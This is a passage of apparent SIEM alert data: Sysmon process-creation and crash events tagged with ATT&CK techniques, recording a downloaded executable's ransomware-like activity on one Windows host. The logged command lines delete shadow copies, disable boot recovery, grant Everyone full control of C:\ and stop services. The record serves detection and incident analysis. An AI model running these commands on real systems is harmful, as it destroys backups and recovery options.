/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:08.883093600Z"",""eventRecordID"":""1630"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:08.839\r\nProcessGuid: {df9fc3d3-1a98-5ec9-0000-001079ae0c00}\r\nProcessId: 7224\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net1.exe\r\nCommandLine: C:\\Windows\\system32\\net1 stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E\r\nParentProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00}\r\nParentProcessId: 6236\r\nParentImage: C:\\Windows\\System32\\net.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:08.839"",""processGuid"":""{df9fc3d3-1a98-5ec9-0000-001079ae0c00}"",""processId"":""7224"",""image"":""C:\\\\Windows\\\\System32\\\\net1.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""net1.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\net1 stop 
\\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E"",""parentProcessGuid"":""{df9fc3d3-1a98-5ec9-0000-0010e4880c00}"",""parentProcessId"":""6236"",""parentImage"":""C:\\\\Windows\\\\System32\\\\net.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y""}}}" +"May 23, 2020 @ 12:44:19.587",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:08.013 +ProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00} +ProcessId: 6236 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:08.020210300Z"",""eventRecordID"":""1626"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:08.013\r\nProcessGuid: {df9fc3d3-1a98-5ec9-0000-0010e4880c00}\r\nProcessId: 6236\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""samss\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:08.013"",""processGuid"":""{df9fc3d3-1a98-5ec9-0000-0010e4880c00}"",""processId"":""6236"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""samss\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:19.493",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:07.673 +ProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00} +ProcessId: 6048 +Image: C:\Windows\System32\net.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net.exe +CommandLine: ""C:\Windows\System32\net.exe"" stop ""audioendpointbuilder"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","\""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" 
/y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:07.834345700Z"",""eventRecordID"":""1623"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:07.673\r\nProcessGuid: {df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}\r\nProcessId: 6048\r\nImage: C:\\Windows\\System32\\net.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: net.exe\r\nCommandLine: \""C:\\Windows\\System32\\net.exe\"" stop \""audioendpointbuilder\"" /y\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:07.673"",""processGuid"":""{df9fc3d3-1a97-5ec9-0000-0010aa7f0c00}"",""processId"":""6048"",""image"":""C:\\\\Windows\\\\System32\\\\net.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Net Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""net.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\System32\\\\net.exe\\\"" stop \\\""audioendpointbuilder\\\"" /y"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=A63DF9A6E9098CC189F2A3EFC37600F6,SHA256=96CDFD7B263947A6A7C0DB54141A6B8D7777DB0A03A17CBF95666D98422F937B,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:18.058",9,"Windows Application error event","""Volume Shadow Copy Service information: The COM Server with CLSID {e579ab5f-1cc4-44b4-bed9-de0991ff0623} and name Coordinator cannot be started. [0x80070005, Access is denied. 
+] """,, +"May 23, 2020 @ 12:44:17.302",9,"Windows Application error event","""Faulting application name: StartMenuExperienceHost.exe, version: 0.0.0.0, time stamp: 0x5d65fb6a +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0x11d8 +Faulting application start time: 0x01d630ffc3edb2c7 +Faulting application path: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e22519a7-e804-4b68-a44a-3aaf0ab24d16 +Faulting package full name: Microsoft.Windows.StartMenuExperienceHost_10.0.18362.449_neutral_neutral_cw5n1h2txyewy +Faulting package-relative application ID: App""",, +"May 23, 2020 @ 12:44:17.108",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:05.013 +ProcessGuid: {df9fc3d3-1a95-5ec9-0000-0010d3590c00} +ProcessId: 7040 +Image: C:\Windows\System32\bcdedit.exe +FileVersion: 10.0.18362.295 (WinBuild.160101.0800) +Description: Boot Configuration Data Editor +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: bcdedit.exe +CommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default} +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","bcdedit /set {default} recoveryenabled No & bcdedit /set 
{default}","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:05.164693700Z"",""eventRecordID"":""1616"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:05.013\r\nProcessGuid: {df9fc3d3-1a95-5ec9-0000-0010d3590c00}\r\nProcessId: 7040\r\nImage: C:\\Windows\\System32\\bcdedit.exe\r\nFileVersion: 10.0.18362.295 (WinBuild.160101.0800)\r\nDescription: Boot Configuration Data Editor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: bcdedit.exe\r\nCommandLine: bcdedit /set {default} recoveryenabled No & bcdedit /set {default}\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:05.013"",""processGuid"":""{df9fc3d3-1a95-5ec9-0000-0010d3590c00}"",""processId"":""7040"",""image"":""C:\\\\Windows\\\\System32\\\\bcdedit.exe"",""fileVersion"":""10.0.18362.295 (WinBuild.160101.0800)"",""description"":""Boot Configuration Data Editor"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 
Corporation"",""originalFileName"":""bcdedit.exe"",""commandLine"":""bcdedit /set {default} recoveryenabled No & bcdedit /set {default}"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=66E4F813624DF01D67CF03616760A7AC,SHA256=1EE229900C128119A122F9A7B3FF8CA2AB35154B314FC6B37CDA6CE041E4277D,IMPHASH=0DEEFF11123C4A14A058E9390224FECE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:17.098",15,"ATT&CK T1070 T1490: Shadow Copies Deletion Using Operating Systems Utilities","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:04.964 +ProcessGuid: {df9fc3d3-1a94-5ec9-0000-001070590c00} +ProcessId: 7024 +Image: C:\Windows\System32\vssadmin.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Command Line Interface for Microsoft® Volume Shadow Copy Service +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: VSSADMIN.EXE +CommandLine: vssadmin.exe Delete Shadows /all /quiet +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","vssadmin.exe Delete Shadows 
/all /quiet","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:05.160426800Z"",""eventRecordID"":""1615"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:04.964\r\nProcessGuid: {df9fc3d3-1a94-5ec9-0000-001070590c00}\r\nProcessId: 7024\r\nImage: C:\\Windows\\System32\\vssadmin.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Command Line Interface for Microsoft® Volume Shadow Copy Service \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: VSSADMIN.EXE\r\nCommandLine: vssadmin.exe Delete Shadows /all /quiet\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:04.964"",""processGuid"":""{df9fc3d3-1a94-5ec9-0000-001070590c00}"",""processId"":""7024"",""image"":""C:\\\\Windows\\\\System32\\\\vssadmin.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Command Line Interface for Microsoft® Volume Shadow Copy Service"",""product"":""Microsoft® Windows® 
Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""VSSADMIN.EXE"",""commandLine"":""vssadmin.exe Delete Shadows /all /quiet"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=02A10DBF904883B1F8EE9F3CC70F5EB8,SHA256=ACDCC96D628EE8FF7F07FC5D795A05C22EB239BE0D44A9F01727B6124A9619A9,IMPHASH=C1EDC431CD345F0A0F32019895D13FCE"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:17.064",15,"ATT&CK: WannaCry Ransomware","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:44:04.844 +ProcessGuid: {df9fc3d3-1a94-5ec9-0000-00100e580c00} +ProcessId: 6820 +Image: C:\Windows\System32\icacls.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: iCACLS.EXE +CommandLine: icacls ""C:\*"" /grant Everyone:F /T /C /Q +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399 +ParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00} +ParentProcessId: 6352 +ParentImage: C:\Users\John Williams\Downloads\cUIyKIO.exe +ParentCommandLine: ""C:\Users\John Williams\Downloads\cUIyKIO.exe"" 8 LAN""","icacls \""C:\\*\"" /grant Everyone:F /T /C 
/Q","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:44:04.924985800Z"",""eventRecordID"":""1613"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:44:04.844\r\nProcessGuid: {df9fc3d3-1a94-5ec9-0000-00100e580c00}\r\nProcessId: 6820\r\nImage: C:\\Windows\\System32\\icacls.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: \r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: iCACLS.EXE\r\nCommandLine: icacls \""C:\\*\"" /grant Everyone:F /T /C /Q\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300}\r\nLogonId: 0x33C72\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399\r\nParentProcessGuid: {df9fc3d3-1a8d-5ec9-0000-0010fd610b00}\r\nParentProcessId: 6352\r\nParentImage: C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\r\nParentCommandLine: \""C:\\Users\\John Williams\\Downloads\\cUIyKIO.exe\"" 8 LAN\""""},""eventdata"":{""utcTime"":""2020-05-23 12:44:04.844"",""processGuid"":""{df9fc3d3-1a94-5ec9-0000-00100e580c00}"",""processId"":""6820"",""image"":""C:\\\\Windows\\\\System32\\\\icacls.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""iCACLS.EXE"",""commandLine"":""icacls \\\""C:\\\\*\\\"" /grant Everyone:F /T /C 
/Q"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-1a6b-5ec9-0000-0020723c0300}"",""logonId"":""0x33c72"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=D8B5077F15576983CB8D344F21FD1309,SHA256=3524EDE090FE503A30DEC8F629A74B8F720C9A230E5C4E49A3BB151C8AC1424A,IMPHASH=446163A548337B5BCF2727BCD1CFB399"",""parentProcessGuid"":""{df9fc3d3-1a8d-5ec9-0000-0010fd610b00}"",""parentProcessId"":""6352"",""parentImage"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe"",""parentCommandLine"":""\\\""C:\\\\Users\\\\John Williams\\\\Downloads\\\\cUIyKIO.exe\\\"" 8 LAN""}}}" +"May 23, 2020 @ 12:44:15.358",9,"Windows Application error event","""Faulting application name: sihost.exe, version: 10.0.18362.1, time stamp: 0xe9587576 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe10 +Faulting application start time: 0x01d630ffc1053bff +Faulting application path: C:\Windows\system32\sihost.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: e0bbd6c8-ffc1-49b3-b717-c3512b541a5a +Faulting package full name: +Faulting package-relative application ID: """,, +"May 23, 2020 @ 12:44:10.918",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-23 12:43:59.058 +ProcessGuid: {df9fc3d3-1a8f-5ec9-0000-001044a70b00} +ProcessId: 6560 +Image: C:\Windows\System32\net1.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Net Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: net1.exe +CommandLine: C:\Windows\system32\net1 stop ""samss"" /y +CurrentDirectory: C:\Windows\system32\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-1a6b-5ec9-0000-0020723c0300} +LogonId: 0x33C72 +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=0F641F87A791AE07C00A725BBBD77724,SHA256=286E7F127B06386BD1CC9664851848F483A867F0F604AA352893151068715FAA,IMPHASH=41DBA1AF77E1A2260F0CE46D59ADCB5E +ParentProcessGuid: {df9fc3d3-1a8e-5ec9-0000-0010967b0b00} +ParentProcessId: 6420 +ParentImage: C:\Windows\System32\net.exe +ParentCommandLine: ""C:\Windows\System32\net.exe"" stop ""samss"" /y""","C:\\Windows\\system32\\net1 stop \""samss\"" /y","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-23T12:43:59.101506700Z"",""eventRecordID"":""1586"",""processID"":""2100"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-23 12:43:59.058\r\nProcessGuid: {df9fc3d3-1a8f-5ec9-0000-001044a70b00}\r\nProcessId: 6560\r\nImage: C:\\Windows\\System32\\net1.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Net 